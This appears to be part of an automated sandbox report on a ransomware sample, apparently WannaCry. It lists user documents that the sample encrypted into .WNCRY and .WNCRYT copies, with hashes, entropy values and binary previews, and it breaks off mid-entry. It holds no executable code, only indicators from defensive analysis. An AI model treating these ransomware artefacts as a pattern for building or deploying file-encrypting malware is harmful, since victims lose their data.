                                SSDEEP:24:4zleeHINVtZY380X/wwoWFmAtVqIxBrHmJmWEKQLmu6RR/woNSCDJdQfuY03:4Uj0X/wfWdfNxOUmu6RR/dNSaQTA
                                MD5:6D1A9B633A713BB8DD49DDBF887208D3
                                SHA1:7979261F121075636AB75991BD5F49D9A7F832E8
                                SHA-256:8B12B79139D957FBE7C546F2DFDC49143B8921C5D741B8B17457587257221369
                                SHA-512:01B9BFB7ACD99BA38D8B135C9EE5AFA7AF045F9FAD8032BE4DA306D98D9DD8DD60DBF6F579D01B29F255BE6576CEB2FDE1B713802374BBEAED2A07ADD8D39321
                                Malicious:false
                                Reputation:unknown
                                Preview:...3...1.&D...D..]e....T....Y..K.g.....\.F_..qb`.).........6...rn...(..&...........*.......B.V%.HE.j.I.y*...2P.C....c..e%..d...+ny...&T].O.QpPq....E.v.c.K..cnJ.zT...{..Q?.^.3.M.K..m.c...-^w,.!58.-.48a....5....8.l.RW1..P.y.B....e.C.]."g..Qu..M....U..$c*U]3..R.pN..3....K..K.T[0%*.Y..;(...3M.X<..J....JB8..........fx1..._.G.N%...)...nY.N.2. ...D.%.r...".FD...S....x..Z...8.v.OSi.2Ys...@.........d....KP..`...x>.....Q..sz..L.o.>:f..V.lC..;8..#D9)*.8(...*C.u..\..6}..Q.g!A.,...R....<)..|...~X.7.R....&..s.O.hS...6..p..m.f.(..2.A.......?.$......o........x.Y`Gd6.Qu..P...=.a..~>..EP.3.H.;...../.4....<..@.k...........0FB..E}..'.#.......p.p.%.a.. .Sr..e....*.l.f........k...i./....^|........R...%.?...g...7`.k%..L._.G 9.e......g.v..g.....H3.GF..E..[....ON4.[.*.5j.E.......F.I.E..#:V.04_wl.....n...._\.......:",....r....iB%&m.K.+.J.(e!.\.C.ei{L....=?n6..;>.{.cYg...G.L...0...>..;H.+...p?.FX.h.^.....&J..u.w....!LbZ....0. ...F;A.:.I...5<.~.m..mZ.W...Y.()7.(

                                C:\Users\user\Documents\EFOYFBOLXA.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.824354712562156
                                Encrypted:false
                                SSDEEP:24:bkl8klYsaGk77UPoyombyfAoftRR2YgyYqon+3ZmuuhVndceyAksmQUY96e7xD/m:bkl8kFAsPodjAofvQYgytonru4nKef1y
                                MD5:0FD7701890C1F399E3C0DEA270219610
                                SHA1:42C69A9F5E6EB77B73B11661F7EB8DC4E09D087F
                                SHA-256:CFC57F79EFA5039F20063C3B69DE93AB43C2087045B95F1E7C234D6D1A8C243C
                                SHA-512:06E9F3F49BB30D04FDD24CF27B12E778903E39B44932F83DC6BE63A9C78498BE9B8FC79117169061536DB5AD557C7C11621A717BD14906E217C414DC7B91A237
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......^A.J...Ny...y.$2e.....=.c....^..7.U..J. ..0.;..$....$f.;......._.Yx....^rc..6.......7.jc..-.xl.V.M......QA..}(.y.A.(7.....\..9?1...._..P.x<F.....z.....w..&...0.0.@M...*.@(............k. .J.........(./.;..3..'..Q>W^...H,p..R.S/...7...z.p.F............C...5y...:u....D.TJ."..............Fa0l5PsV.ws...'D....L....*..........._d".0.#Baq;k+.......P..z...f..K^..w...ga.t.v{&..........;..W.......k....8....L...g8..=g6..s..X5...l.X.&..5...U.|..1..g%.....l..N.&H..WW.x.R._a...@..b.l.fh7.....`.0h.7.S*...j..i. !...=P..%.n.X:..S....04bv.!..8...;0....e.~..L..3.(@'.._......kA^.^iR..Cn.b_..+#....O.r+.....l.,=.....L....;....v...u.......7...Q\.j2.$.O.r.o8j.....^....j..VN.m..{A..`>.dGy'..$..P..H.....R.........}|.O.......SB.Kh......'.......[..R..^+..<..!}u6nT..at7...|....S7.^/....ar...H._I........~....h....9....k*'...P.g..!....[:.j.l._...1....>.j.x..t.=.:E......6u.FE*...V..e.W3$.Y}$du_.RU.J......k.z2.......y.F...]=.)f.pO{....v?..v......&.&..

                                C:\Users\user\Documents\EFOYFBOLXA.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.824354712562156
                                Encrypted:false
                                SSDEEP:24:bkl8klYsaGk77UPoyombyfAoftRR2YgyYqon+3ZmuuhVndceyAksmQUY96e7xD/m:bkl8kFAsPodjAofvQYgytonru4nKef1y
                                MD5:0FD7701890C1F399E3C0DEA270219610
                                SHA1:42C69A9F5E6EB77B73B11661F7EB8DC4E09D087F
                                SHA-256:CFC57F79EFA5039F20063C3B69DE93AB43C2087045B95F1E7C234D6D1A8C243C
                                SHA-512:06E9F3F49BB30D04FDD24CF27B12E778903E39B44932F83DC6BE63A9C78498BE9B8FC79117169061536DB5AD557C7C11621A717BD14906E217C414DC7B91A237
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......^A.J...Ny...y.$2e.....=.c....^..7.U..J. ..0.;..$....$f.;......._.Yx....^rc..6.......7.jc..-.xl.V.M......QA..}(.y.A.(7.....\..9?1...._..P.x<F.....z.....w..&...0.0.@M...*.@(............k. .J.........(./.;..3..'..Q>W^...H,p..R.S/...7...z.p.F............C...5y...:u....D.TJ."..............Fa0l5PsV.ws...'D....L....*..........._d".0.#Baq;k+.......P..z...f..K^..w...ga.t.v{&..........;..W.......k....8....L...g8..=g6..s..X5...l.X.&..5...U.|..1..g%.....l..N.&H..WW.x.R._a...@..b.l.fh7.....`.0h.7.S*...j..i. !...=P..%.n.X:..S....04bv.!..8...;0....e.~..L..3.(@'.._......kA^.^iR..Cn.b_..+#....O.r+.....l.,=.....L....;....v...u.......7...Q\.j2.$.O.r.o8j.....^....j..VN.m..{A..`>.dGy'..$..P..H.....R.........}|.O.......SB.Kh......'.......[..R..^+..<..!}u6nT..at7...|....S7.^/....ar...H._I........~....h....9....k*'...P.g..!....[:.j.l._...1....>.j.x..t.=.:E......6u.FE*...V..e.W3$.Y}$du_.RU.J......k.z2.......y.F...]=.)f.pO{....v?..v......&.&..

                                C:\Users\user\Documents\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.789419072134636
                                Encrypted:false
                                SSDEEP:24:lqKaLbgq9hIIJEp/klZOCkx0rPpskp7Cmzla50Sdez:Gr9R4/kltkqPpRp7Dau0ez
                                MD5:6437335334D51D32EB99950C36DF30D8
                                SHA1:0D2F5DA061DED83A3BCC250AE948F54C77DA1B7D
                                SHA-256:A0BEFCEA6C4A39A94209D58B56D04AFF2402BE873483134E1BF062C1DF0DAF97
                                SHA-512:44C02EDD0B86BC7BA6F5CB7DAAE4FB0A63FF33D08C86C0B58C60593621937D1619B460115EF949DFC3F7955C1350A09F52D63C43237733EE7C97A128C4C51F38
                                Malicious:false
                                Reputation:unknown
                                Preview:@..j.f.?......%..b..........U.......*.O:B~."!}......vN..jjF.......ssND7.E....T...x..U.'Y..7.}}.*Z....j.g.8J)...^....*.`w......z+..o..<.6..Eq..8.#.QMX....>...u....P.l.e.....t.h..X....{#.e..X.8}...K.....D.G.U!..<..K|=].J....ic...........%...g.F.I...M.c..l..A. ,3..0..A...[.....).c....F.9vR.c.z....Ht.h.u.......&.v......4.......U.z..{.V.....AYa.S.b..Z*......2}g......8.......v....>...Gy...L/..r..2.0.....+n....\........A...N..O_;.T..3..ztQZ.m...6sNO....3..Z$.8K6.:...s"A....=.&.U.%..![x.*N.'....;/.).....Z...8..ve.'L.r..:.......w=-6...D.k...Q#..:.W..`._.]..C.N...9`#....B.EON-c..[..N...B..S.ru.Wy.k......`.hD...../(....*fr...".se..*.7GL......Fp.a16...4...K-r....L....&.Bn...U..?...ff....i..'b....-.7,..Sw.1..#.:.q$.E\.......{B[....N5G.G........,..)..c6.K...0 ..\........^ ......-X.l.^..$.A..L1...]..HN...A.TGx..T.y...b.X.'..Z.H..m..?.j#.......#~...'^.A.Re+../.Z..o....Lf{..]$.X^....r.g..$s...'..5H...)........./f..e.....K....o.Q.../.-,0..k6.G.].

                                C:\Users\user\Documents\EFOYFBOLXA.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839824053294216
                                Encrypted:false
                                SSDEEP:24:bk6CzX/IVKwzUbug/a0PLPzveRYBycb4epQH7sgX0BBpWttb5KA4pC5818Vy+X:bk6cX/G0/a0jPzGRYBUeJk0BTaQe8QX
                                MD5:BF3510DCA2C7C9102C1AB67885FC192E
                                SHA1:65DF09586F5C11D0F074363B488BFD8AD1B64E07
                                SHA-256:1D19D538402A7A749E9658F9445B38AD300610A9705ADAF3B59D9C83940B42C0
                                SHA-512:6F7FBFC5ED189FC602FC99975099012388D6CB11FDFED7EA49DC1B0D488C3AC75AD676F291952E289B502F8A7E856B7CDD7BE16F4C665F15E3C9D55B5414E5D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......LC..O.~..H.....;......e..+..r..u..=..o[v.T.....*/.E.Cx).i....e,......k..:....(2iYRn..XX..n.l....].3f..q.....a6,..g...p....p..<.ky<^..ki....P....Q.............oI..._...fL.u..0.u.".%_..y.ZV.@.7../.8p90..*.;/..C....1#..h.utg.D......r-.y.80.Q<.7n.S.............c...#.F.....>...Wpj...8.X.}P1)..|}..t......KT....p.h..7....._..e3.Hb...U...'...I1..4.U....L..8..:Suk.....>.d.A...Ks..v.2..`.l...V......DL......!nt....y(..,. ......[.........<a... l..p......9. [\..}..._....5....0zN.p?D......WHH.l.'....[..}>R.. ......4.......{B.Z....Q..Z.[.SZ....K.*...K..2 .A...Y....C9d.D ..P.M%. E.".......H.G.=.....h.rg..^......l..c..S...$2v......j./.......@.3...4=...a.R,|.j...v.C..m.8.@....:Q>M.Bx......Z..g)..%..q.%..y6..#d.......]..[.~@....w(e/.@..p. .....%...U.v.9.^.m..8n...H....V.."=..ut..._.=........_.D...M.5....5.E<>.."I.0.Qj@a..r".!.U..(...}4..9.L@.Y....._......a..kaO|...X..ZdN..:...EkGz......(.t...x...`LQ....[@....._.........>...zK4.X..

                                C:\Users\user\Documents\EFOYFBOLXA.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839824053294216
                                Encrypted:false
                                SSDEEP:24:bk6CzX/IVKwzUbug/a0PLPzveRYBycb4epQH7sgX0BBpWttb5KA4pC5818Vy+X:bk6cX/G0/a0jPzGRYBUeJk0BTaQe8QX
                                MD5:BF3510DCA2C7C9102C1AB67885FC192E
                                SHA1:65DF09586F5C11D0F074363B488BFD8AD1B64E07
                                SHA-256:1D19D538402A7A749E9658F9445B38AD300610A9705ADAF3B59D9C83940B42C0
                                SHA-512:6F7FBFC5ED189FC602FC99975099012388D6CB11FDFED7EA49DC1B0D488C3AC75AD676F291952E289B502F8A7E856B7CDD7BE16F4C665F15E3C9D55B5414E5D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......LC..O.~..H.....;......e..+..r..u..=..o[v.T.....*/.E.Cx).i....e,......k..:....(2iYRn..XX..n.l....].3f..q.....a6,..g...p....p..<.ky<^..ki....P....Q.............oI..._...fL.u..0.u.".%_..y.ZV.@.7../.8p90..*.;/..C....1#..h.utg.D......r-.y.80.Q<.7n.S.............c...#.F.....>...Wpj...8.X.}P1)..|}..t......KT....p.h..7....._..e3.Hb...U...'...I1..4.U....L..8..:Suk.....>.d.A...Ks..v.2..`.l...V......DL......!nt....y(..,. ......[.........<a... l..p......9. [\..}..._....5....0zN.p?D......WHH.l.'....[..}>R.. ......4.......{B.Z....Q..Z.[.SZ....K.*...K..2 .A...Y....C9d.D ..P.M%. E.".......H.G.=.....h.rg..^......l..c..S...$2v......j./.......@.3...4=...a.R,|.j...v.C..m.8.@....:Q>M.Bx......Z..g)..%..q.%..y6..#d.......]..[.~@....w(e/.@..p. .....%...U.v.9.^.m..8n...H....V.."=..ut..._.=........_.D...M.5....5.E<>.."I.0.Qj@a..r".!.U..(...}4..9.L@.Y....._......a..kaO|...X..ZdN..:...EkGz......(.t...x...`LQ....[@....._.........>...zK4.X..

                                C:\Users\user\Documents\GIGIYTFFYT.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820851557299335
                                Encrypted:false
                                SSDEEP:24:OqhWXmWW0hpAMmSh7LKq8Z0PrNLzktpwPlnM:OqEX/WWA4z9zMunM
                                MD5:23D86573183957AEE082DA2A12BB18BA
                                SHA1:35FEBA9AD163DECA451FBD05664D0CBF3ED9E79A
                                SHA-256:7C9B39D1C8611F920C61AA6E4D7C0B4E4C05B39E6FE884F7B75B10F0D221FC3D
                                SHA-512:E21EC48766E9A52E8F4B5E3256A987C862D0A704FA889DE2030950383864F61001B0BFDC3522DA105B996B114A353B0C3E83D44A35E36BC8544C3E85558E3FDD
                                Malicious:false
                                Reputation:unknown
                                Preview:..zBvn...'i..:.E{4...!......E.Y9...~......XC.!.....|..9. .k....`i.N....Pk.P.[........d..@]...=...tq.%..s.\2.4..H:...y..j....fb.n.y/z).,../3..i..S..yh.r1.]q.+.y;...H.z..v........pW .~9..rVwq..^B....y6.M(.^....m.2.. U.t.8.0:].-H...wQ?.:.U.1:Iz....yk.(..g/...e>............0....L.....5...z.C..B.UG..B....f.g./..oe~.Vc..\C..(...l..ta~.....l.....$..u.....-Z.... .....R".=C..3..T..t%..L.....Ho...xP.Xd.A..%Up.\.^(...e..~~II..x..O......X.3....E....2...-......a...i.jT.P1r..%S..F...kH..c.[....|.uG...s..f.X../.4VZc.\.T......-.z....-....|_/^+7...V.8fd....9....a:%.0..\.8.oCF.X..i.-Ic.n..\z4......G.^.d.c[..R....(..`M......4...b.i....2.:.5...@.2..........m..hR...0.4...q;_'.*!7.<;.....4<.C..ZsY8qz.&x.p....V...,.qn.hf..w..bY..>O._p..x.pY.....5..$.*.....?..(....F....lE:...rt.v.s)...OF...p..A....C.....|H.}.u...I_......._....O)o...3......`...\..L.i.[...>.....;...}9.w'...&1.&snq...E.d..BU..IG...T...............k......L.....2.2e.nq.".P....f<7.YE].}.0.z;

                                C:\Users\user\Documents\GIGIYTFFYT.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.868446246690582
                                Encrypted:false
                                SSDEEP:24:bkzYJ8f8KuSUkG0DcwKqZ6UKrHh7pQbYZIHXTfY9N0oAck0103rf9:bk8Wm251mbQhfY/0oARuIj9
                                MD5:610AE37DBDE8E10074A288D843D1EC92
                                SHA1:A85E6C5AEE3678E1CAF6D1A942155F6D5B1DEF5F
                                SHA-256:92EB607E1BB4797DE81C6878D1E529F97E5878E18F1B6E3E84804E05078BF472
                                SHA-512:5810D22930D3D50F657FBDC7DA0C628C28F847F59F32DA8DC38D4D1FDE58F33676F0B0A1B2EAA8778DF1CD07D11FF309920C5F848A9E794AB59017EE54CF857A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......F.U]@.....a..D...Q..%...../..g].|...3`...{C....z..3ZoJ......<...`4..d..:.....w..+....c'H......V..uE.......Y................(V......O.B=..}..T..X>.*.....zv.....3.o....`.=.(..g)ei...?.#^x.T .Z..IZ....]....1...y.?./.LZ.!T..1S=h...Ky.................<.d........Y~8.A4k..>..!....ZJ..f...E....oU.J_....;oc...C}0E....W....xZ..5=......09.r....J...l".....<r..z.....,...*V{*...\g~..\.G..2.}...t......c.1.....d..O.......R-.......X..r..b.s.8..(5.z..3.>..KD.2.&.g.......'o.2... .....X....AK5.o..0.Z.X)......$.#...yJR..D......MK..j..M..]...}.%..['P....n.$9..W?...@,......Gx...n|..|.<S...t|5T.B....f.?*.....$\.yv...#.V.IFdl...Lav.n.*.........X./.v....]x.......}@'..L.`...}.....f....d2=........lSk?..'.P.d$...2>....)..?.i/.m...7b..b...f.....x3.H.f....i~..b.K.z]%^.........m.G.....cv.r%{.....6.-..=..$..%*....B.xK....39H...d.......Gmf+....$. ....*qS..H..@.....s%.....IJ..d...K.........$q./>.....<.6.8..+i...}.%y...`..]z.j...w.....Q.K..sY..L..VQ..r.

                                C:\Users\user\Documents\GIGIYTFFYT.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.868446246690582
                                Encrypted:false
                                SSDEEP:24:bkzYJ8f8KuSUkG0DcwKqZ6UKrHh7pQbYZIHXTfY9N0oAck0103rf9:bk8Wm251mbQhfY/0oARuIj9
                                MD5:610AE37DBDE8E10074A288D843D1EC92
                                SHA1:A85E6C5AEE3678E1CAF6D1A942155F6D5B1DEF5F
                                SHA-256:92EB607E1BB4797DE81C6878D1E529F97E5878E18F1B6E3E84804E05078BF472
                                SHA-512:5810D22930D3D50F657FBDC7DA0C628C28F847F59F32DA8DC38D4D1FDE58F33676F0B0A1B2EAA8778DF1CD07D11FF309920C5F848A9E794AB59017EE54CF857A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......F.U]@.....a..D...Q..%...../..g].|...3`...{C....z..3ZoJ......<...`4..d..:.....w..+....c'H......V..uE.......Y................(V......O.B=..}..T..X>.*.....zv.....3.o....`.=.(..g)ei...?.#^x.T .Z..IZ....]....1...y.?./.LZ.!T..1S=h...Ky.................<.d........Y~8.A4k..>..!....ZJ..f...E....oU.J_....;oc...C}0E....W....xZ..5=......09.r....J...l".....<r..z.....,...*V{*...\g~..\.G..2.}...t......c.1.....d..O.......R-.......X..r..b.s.8..(5.z..3.>..KD.2.&.g.......'o.2... .....X....AK5.o..0.Z.X)......$.#...yJR..D......MK..j..M..]...}.%..['P....n.$9..W?...@,......Gx...n|..|.<S...t|5T.B....f.?*.....$\.yv...#.V.IFdl...Lav.n.*.........X./.v....]x.......}@'..L.`...}.....f....d2=........lSk?..'.P.d$...2>....)..?.i/.m...7b..b...f.....x3.H.f....i~..b.K.z]%^.........m.G.....cv.r%{.....6.-..=..$..%*....B.xK....39H...d.......Gmf+....$. ....*qS..H..@.....s%.....IJ..d...K.........$q./>.....<.6.8..+i...}.%y...`..]z.j...w.....Q.K..sY..L..VQ..r.

                                C:\Users\user\Documents\GLTYDMDUST.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816929409996816
                                Encrypted:false
                                SSDEEP:24:TNSrVfgRddz41v+vEmtq8YynYiKNNFAEKB4WjhWxoL8YfPP:5SrVfYzMkqgKXXKB4DxbMPP
                                MD5:67720B41BA85819F5C1F323BCE21116F
                                SHA1:CCEAE57F753004CB86668573CD4E72A3BF32C011
                                SHA-256:F84B5AA732C7B19D52F3AC87E378748007F21CF761398C48D30D236367A913B0
                                SHA-512:67AD8E9C4010E321A77732676720A477E8D4E2E15D7E1F89D16D8D6D18F507175D3833312D726FF7E127ACD41A2F923E71B6904D16F505EB1C87FB04AC0582D6
                                Malicious:false
                                Reputation:unknown
                                Preview:....+..?F5...d......8..J...#...I.|..h.h.G..;&p......{j.e..;?.s&pQU...#U.X....d........F.>.M.-....L.|..ei...!D/.c..._.$...J...Pn.......n........Q.tK.!_5......DS.a..np.mv....J....]WUb.`.G0.iM..%..0...Z......$..-8.q..h.C......h..J..G.?.%oV|..d..b..H.s..M..0;.~.M..W.a.$.....P5.,..&.{..D.V..z[.uB.~..j`k.....`.Zq3........l= .`".8."j..A....$.#..V-..\.ysGW...Yo..........[..Y..S.2O.+N...1=...r......d..A..p.%....5 ".'|q[4bl..!.O]....H{_3..3.8...(.[U...X.4.).nh.'eR.S._.k....8...@'!....!...E.....3.t}...H.....@iDvC0M.J..0....W.C6....X.+..~.Lx.7U..BWy.8..3=`.g.3,m)>.\..... ..]-..9..4v...'.R.w.N.....{P...'`.t.Mz^...R.........`P.r@..f....=.$...?..v.p.}.C.ov*..x..&.F"..%g.O.....z...A8..dN...{GM.gT...!Rx.i.2."&.&..,h.hF'...W9....KmR.. ..f.A..h...E<.H.......8.....&.>..w.k.R..F....x.O]....|..Y9.5.L.....h.............a.....5.=u..Q. ..\..>U..4.hi..J1...N..H\]K|..u.Y...'S*......b.J1.4.4\B.._!....*..3..._z..B,._!\.(1.L..F.3\.T.?.....@...zw.f.=.B.H..a+...q.....N?..O

                                C:\Users\user\Documents\GLTYDMDUST.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.835964358352831
                                Encrypted:false
                                SSDEEP:24:bkAw46S5Bl6BcGejTdrebkVi2Wwo3le1Cy81yfSwCfd5FPw6AQIn:bkAw2JlGeR2Zwo3Ub8yfSwCfd5FPwfpn
                                MD5:546E3CA568FC5BDC752C672BAF659A8F
                                SHA1:E9ADC13587632876595C79DD850C338A5D6A2AD7
                                SHA-256:FD9F2AC1BFE1B40BE54ADDEC947DEB2F1D8A4402EC65135C507E593F92168714
                                SHA-512:C72CB014621F7A35F8D7D8C62B852051A44DCC2D70F4695400F24BAACC0487BB9A1598AFD9EA9614808A9CD1C2A67A0632F94B74966C41E2508BE1FB27C0FF54
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......J.@.)X.89.+.*.....|.J.%.\.=c#.+..0C.fUg....[S$.w<...x;..f`.....v>]}..FdaNq..Y.K......2...'......F.n.....4....6Dr.]....Y.S......m."...?B.4L..t}....[n.Ae7..p....u..C....L...k.[r$'..n.d. ...j..9|\_.;.\.>.N.-..W.7...[.*L...+Y.S.V.J.+.....MZ...io\.............@;....I..GR.e.....px.+R.........sfri...x.....8@........WV...h..AL, .c.....[6.....w....q?. ..&. ....xKdv.E...@-......F.E.T.........lY.w.U.n..z*..xZ3..l_.f.8DJ.-......,...k.....p.... /.......b#.q.VW.+...pG..d.suu.a...+[oA./?a8.*Z..;............xs...........Y5R...sJ..D.BN,..0...I._z.a&...c.Z3..&.._.7..w9T.-.z*Z.S.1.....[..`.]...6B.\....-h0[&M.....[..C{...L.d~.N...E%......&..z.?J..n...=..**.+.....\R|....J...Va+?y3...u.......Yfj....<.[.....Z..Qx..!J10...r-.7.=X._.7.....3...__.=T.....L.].]g...WJn...Jt6'.(..xX....!..W..jy..L{ .;...*.t...K..Iv..JVav.M.T{........(..xrM...V.icY...z]i|.....Js.H...[.......9..a.`.T.|^...........-....N..w.iUv.6.X.CE....q[....;<:.E......9.>....x..^..AAu

                                C:\Users\user\Documents\GLTYDMDUST.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.835964358352831
                                Encrypted:false
                                SSDEEP:24:bkAw46S5Bl6BcGejTdrebkVi2Wwo3le1Cy81yfSwCfd5FPw6AQIn:bkAw2JlGeR2Zwo3Ub8yfSwCfd5FPwfpn
                                MD5:546E3CA568FC5BDC752C672BAF659A8F
                                SHA1:E9ADC13587632876595C79DD850C338A5D6A2AD7
                                SHA-256:FD9F2AC1BFE1B40BE54ADDEC947DEB2F1D8A4402EC65135C507E593F92168714
                                SHA-512:C72CB014621F7A35F8D7D8C62B852051A44DCC2D70F4695400F24BAACC0487BB9A1598AFD9EA9614808A9CD1C2A67A0632F94B74966C41E2508BE1FB27C0FF54
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......J.@.)X.89.+.*.....|.J.%.\.=c#.+..0C.fUg....[S$.w<...x;..f`.....v>]}..FdaNq..Y.K......2...'......F.n.....4....6Dr.]....Y.S......m."...?B.4L..t}....[n.Ae7..p....u..C....L...k.[r$'..n.d. ...j..9|\_.;.\.>.N.-..W.7...[.*L...+Y.S.V.J.+.....MZ...io\.............@;....I..GR.e.....px.+R.........sfri...x.....8@........WV...h..AL, .c.....[6.....w....q?. ..&. ....xKdv.E...@-......F.E.T.........lY.w.U.n..z*..xZ3..l_.f.8DJ.-......,...k.....p.... /.......b#.q.VW.+...pG..d.suu.a...+[oA./?a8.*Z..;............xs...........Y5R...sJ..D.BN,..0...I._z.a&...c.Z3..&.._.7..w9T.-.z*Z.S.1.....[..`.]...6B.\....-h0[&M.....[..C{...L.d~.N...E%......&..z.?J..n...=..**.+.....\R|....J...Va+?y3...u.......Yfj....<.[.....Z..Qx..!J10...r-.7.=X._.7.....3...__.=T.....L.].]g...WJn...Jt6'.(..xX....!..W..jy..L{ .;...*.t...K..Iv..JVav.M.T{........(..xrM...V.icY...z]i|.....Js.H...[.......9..a.`.T.|^...........-....N..w.iUv.6.X.CE....q[....;<:.E......9.>....x..^..AAu

                                C:\Users\user\Documents\JDDHMPCDUJ.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.804309702315947
                                Encrypted:false
                                SSDEEP:24:h2TksW9dzFLVy8WVs67hDWM2XANYWICFag3NEy35vKLmtZ:LF9DLI8WVN7NWM2XAaCFj3531KL0Z
                                MD5:979B8860C1619FD7A000E9E2208A214D
                                SHA1:7C8495DEBD794A71FE0D7501FB64B33A53284860
                                SHA-256:FD9E3773A7F4F4BCE5489C247FEDD5418B3C6A30B04DE5800A3C8FFD9A6F3CE0
                                SHA-512:6AD55F566F7AF9308C682105C7E87550011B986FCAE4044841AC3192F8867A3D51F9CFA499308771B4BF941A0CB5866ED8964FA0B3B48E6D03FBC64176AA2208
                                Malicious:false
                                Reputation:unknown
                                Preview:.?`.u5d .y.......C.0...Oi......H.a.U..,..'Vq.....u.:...T..G.LG....^.?.<.!..0`.gl...eN.^.....u....!.-...<by......o.@X0...H........7*U..^..T....)..#0bN...4...r.<.r.j...S>..e........Dyc.......J.....1D..#_.Q...z.(X..y"...f.3.`.;.P,.Kg4&5...Z....3._...~.1..w....^w...Y'...@g....../s......;_w.;.......ek.a...x.$..&H...I......&O..bb...$f...'8h..J..>..K.K.....=3.5..s..bZ...j....Q.T..+.C....y...W.J.......,....@.P.......zT...?r.Z.-......6..s..4rr.....+.T..J6#..*......'.....pv\..t."...8.._.t{...+m..k..K.?.M...|..I..!aA...".H.x..yzU..Z'.p..3........0..!./.........K.Q....A."...IJ...h..?1....p..j.....!@.. 4s/..d..hm..i...P{....$-..(?./a..V.P........."tUD.....k..d....p..i..L..6J....q..q..1=..kP..y6..:".....L.3d....p.0.A.^..T.....a......Wl...K.."[].wo.5.Sh,....CvJ.P.M..~q...h.........M....!Q......q.eW[...?lU..!?.......Bk...C...5...%.Ng0..h....\.w]."...U..`.7^..FyMi...n..}....".n.3x......pB....C9.1_..(.t......A.0...q..(.=.$u.=..x....JQBa.!<7....

                                C:\Users\user\Documents\JDDHMPCDUJ.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.831444859336292
                                Encrypted:false
                                SSDEEP:24:bk1r6Wny06HCtPp/WoKEXrLRgegSj8TlcFVT+H72bWZphBFsW6brUpAySp921D:bk1mWyXHERKE7FbgSkeFLcvBC382Rp9w
                                MD5:31F20B003E2D024B1AC075126D0A8F37
                                SHA1:3D2DB6B0E40A9DE50DE777435517AF1A6658D9CE
                                SHA-256:530A01F6EAADDBC2B8F422C6BD61FDD17498B60D91A0941B0A14212ED44A5B1A
                                SHA-512:FBC6F60D32956B5125A94C727F0F72C5C4A4638EF3EB93390E9599EFAB673093764BD2EBB3796678FD039C67CF13DA6BC1DC489B957C663F7BB72E3E2ECBF791
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....ug.98.T.;.u.....]&..w4_../. u..;.z;..Qe....B. ..r:W.,...`.msl.d.u...WQ=s.^.t.C.g.!.Q..U2ut....M.t.2.,....l"r.......H.(P......5....Ve....E0.X....9..a'p.(H......da.U.. .7I.(7....3..[.._l......p.c.......9.....C.9.!......K.E.....'...s.u.2.`...-!.................~v...Oc.d...\t.;-7..Xf..z...I}G....$.8.P.-W.0.Ta.F.s..n../.=.r.3..:b...!...B...z.S.......e.~..F... y.P.....j.p?..3Mrw;.Y..SP.8]........U....saO2 .c_.K..?.wW......`......?...<..|...nX.`k.B...h9W.)~S...f..<~....&..%n..BS0&.,\.4..N........x..j....o.F]..j.f.../.-....j..|+E'..B./.&\y.~..#.U.T......w...o@.Y...T..W}...G|..w.j.lDd.O...~.+bic-.....K....gF.X%...^..k.-..m9......b4...e.#..4.5c..t..r9..z...?..IR.F.5L.LE....q.}L#.U.'.)..K.?.h.+.v`+C..Y.u..^%Fr../.%....7Y.9..Qlp...G.Qc..@..p*.}>o...Y.E.......r..$7........S%E.......D..._.$..._k..=....O.q...j.!.L..R..e..B{<9K.x..N#....0|/..~......0...GQ..+^l*t.6....f ./.&.VU...w.\...1yL.....$..D,.{.)]W.Y..".s....&..+.fAU]?(...[c..?9.C.m..t...

                                C:\Users\user\Documents\JDDHMPCDUJ.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.831444859336292
                                Encrypted:false
